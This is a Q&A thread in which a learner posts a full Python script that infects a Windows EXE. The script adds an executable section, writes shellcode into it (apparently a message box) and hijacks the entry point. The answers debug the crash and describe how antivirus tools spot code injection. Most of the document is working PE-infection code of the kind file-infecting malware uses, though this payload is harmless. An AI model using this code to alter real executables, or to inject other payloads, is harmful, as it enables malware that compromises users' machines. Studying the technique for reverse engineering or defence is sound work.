# Injecting code into EXE makes the program crash (APPCRASH)

Tags: python-2.7

After learning basic DLL injection I was thinking to step it up a little and continue learning basic EXE injecting also. I found a basic script explaining the process, basically the script inject a message box into an EXE that will run before the native process. I made some changes and everything worked perfectly, however, the code only worked once. The next time I tried it the original program started to crash:

```
test.exe has stopped working

Problem signature:

Problem Event Name:     APPCRASH
Fault Module Name:      StackHash_0a9e
Exception Code:         c0000005
Exception Offset:       004550f0
```

I guess the one time the script run perfectly was an exception and that there must be some serious error in the code somewhere. I have been searching but cannot find some obvious error to me:

```
import pefile
import mmap
import os

def align(val_to_align, alignment):
   return ((val_to_align + alignment - 1) / alignment) * alignment

# Path to EXE file to infect
exe_path = "test.exe"

shellcode = bytes(b"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9"
                  b"\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08"
                  b"\x8b\x7e\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1"
                  b"\xff\xe1\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28"
                  b"\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34"
                  b"\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84"
                  b"\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24"
                  b"\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b"
                  b"\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c"
                  b"\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e"
                  b"\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45\x04\xbb\x7e"
                  b"\xd8\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff\xff\x89"
                  b"\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64\x68"
                  b"\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89\xe6\x56"
                  b"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c"
                  b"\x24\x52\xe8\x5f\xff\xff\xff\x68\x69\x74\x79\x58\x68"
                  b"\x65\x63\x75\x72\x68\x6b\x49\x6e\x53\x68\x42\x72\x65"
                  b"\x61\x31\xdb\x88\x5c\x24\x0f\x89\xe3\x68\x65\x58\x20"
                  b"\x20\x68\x20\x63\x6f\x64\x68\x6e\x20\x75\x72\x68\x27"
                  b"\x6d\x20\x69\x68\x6f\x2c\x20\x49\x68\x48\x65\x6c\x6c"
                  b"\x31\xc9\x88\x4c\x24\x15\x89\xe1\x31\xd2\x6a\x40\x53"
                  b"\x51\x52\xff\xd0\xB8\xF0\x50\x45\x00\xFF\xD0")

# Resize the Executable
print "[*] STEP 0x01 - Resize the Executable"

original_size = os.path.getsize(exe_path)
print "\t[+] Original Size = %d" % original_size
fd = open(exe_path, 'a+b')
map = mmap.mmap(fd.fileno(), 0, access=mmap.ACCESS_WRITE)
map.resize(original_size + 0x2000)
map.close()
fd.close()

print "\t[+] New Size = %d bytes\n" % os.path.getsize(exe_path)

# Add the New Section Header
print "[*] STEP 0x02 - Add the New Section Header"

pe = pefile.PE(exe_path)
number_of_section = pe.FILE_HEADER.NumberOfSections
last_section = number_of_section - 1
file_alignment = pe.OPTIONAL_HEADER.FileAlignment
section_alignment = pe.OPTIONAL_HEADER.SectionAlignment
new_section_offset = (pe.sections[number_of_section - 1].get_file_offset() + 40)

# Look for valid values for the new section header
raw_size = align(0x1000, file_alignment)
virtual_size = align(0x1000, section_alignment)
raw_offset = align((pe.sections[last_section].PointerToRawData +
                    pe.sections[last_section].SizeOfRawData),
                   file_alignment)

virtual_offset = align((pe.sections[last_section].VirtualAddress +
                        pe.sections[last_section].Misc_VirtualSize),
                       section_alignment)

# CODE | EXECUTE | READ | WRITE
characteristics = 0xE0000020
# Section name must be equal to 8 bytes
name = ".axc" + (4 * '\x00')

# Create the section
# Set the name
pe.set_bytes_at_offset(new_section_offset, name)
print "\t[+] Section Name = %s" % name
# Set the virtual size
pe.set_dword_at_offset(new_section_offset + 8, virtual_size)
print "\t[+] Virtual Size = %s" % hex(virtual_size)
# Set the virtual offset
pe.set_dword_at_offset(new_section_offset + 12, virtual_offset)
print "\t[+] Virtual Offset = %s" % hex(virtual_offset)
# Set the raw size
pe.set_dword_at_offset(new_section_offset + 16, raw_size)
print "\t[+] Raw Size = %s" % hex(raw_size)
# Set the raw offset
pe.set_dword_at_offset(new_section_offset + 20, raw_offset)
print "\t[+] Raw Offset = %s" % hex(raw_offset)
# Set the following fields to zero
pe.set_bytes_at_offset(new_section_offset + 24, (12 * '\x00'))
# Set the characteristics
pe.set_dword_at_offset(new_section_offset + 36, characteristics)
print "\t[+] Characteristics = %s\n" % hex(characteristics)

# Modify the Main Headers
print "[*] STEP 0x03 - Modify the Main Headers"
pe.FILE_HEADER.NumberOfSections += 1
print "\t[+] Number of Sections = %s" % pe.FILE_HEADER.NumberOfSections
pe.OPTIONAL_HEADER.SizeOfImage = virtual_size + virtual_offset
print "\t[+] Size of Image = %d bytes" % pe.OPTIONAL_HEADER.SizeOfImage

pe.write(exe_path)

pe = pefile.PE(exe_path)
number_of_section = pe.FILE_HEADER.NumberOfSections
last_section = number_of_section - 1
new_ep = pe.sections[last_section].VirtualAddress
print "\t[+] New Entry Point = %s" % hex(pe.sections[last_section].VirtualAddress)
oep = pe.OPTIONAL_HEADER.AddressOfEntryPoint
print "\t[+] Original Entry Point = %s\n" % hex(pe.OPTIONAL_HEADER.AddressOfEntryPoint)
pe.OPTIONAL_HEADER.AddressOfEntryPoint = new_ep

# Inject the Shellcode in the New Section
print "[*] STEP 0x04 - Inject the Shellcode in the New Section"

raw_offset = pe.sections[last_section].PointerToRawData
pe.set_bytes_at_offset(raw_offset, shellcode)
print "\t[+] Shellcode wrote in the new section"

pe.write(exe_path)
```

I read that AV can detect the code as "malicious" in some cases which could be a reason but the program is run in a virtual box on Windows 7 without any AV. The problem must, with other words, be somewhere in the code...

Would appreciate a kick in the right direction, so to speak.

Answer (score 0):

There's alot that could go wrong in PE file.

For example what I've encountered and don't see solved in your file, is that the header could go out of space and you're writing your last section over the first sections data. The header size is specified as `SizeOfHeaders` in pe header altho you should also compare it with the 1st section `PointerToRawData` (keeping in mind that a compiler could add a section with no raw data but virtual space allocated).

I don't see you appending anything to relocation table, so you **could** go in trouble with `ImageBase` and if you're calling a `WINAPI` you **must** get it's VA (lookup `Import Table`). If the neccesary `WINAPI` is not present in imports, you must add it in order to call it.

My advise would be to take a basic dissasambler (like OllyDbg) or even hex editor and try to see what's wrong.

Answer (score 0):

Anti-Virus product's tend to notify you when an object has been blocked and quite frankly you should be notified that most security solutions are awful at mitigating code injection. The ones that do tend to do it properly usually have some form of "toggable" Behavior Blocker/HIPS protection.

Moving on, such detection's are usually raised by an "unknown" or "untrusted" process creating a remote thread, dispatching an APC targeting a thread not belonging to the requester's process, or attempting to thread hijack without the use of APC (e.g. NtSetContextThread) to a thread not belonging to the requester's process... As opposed to the code being injected itself.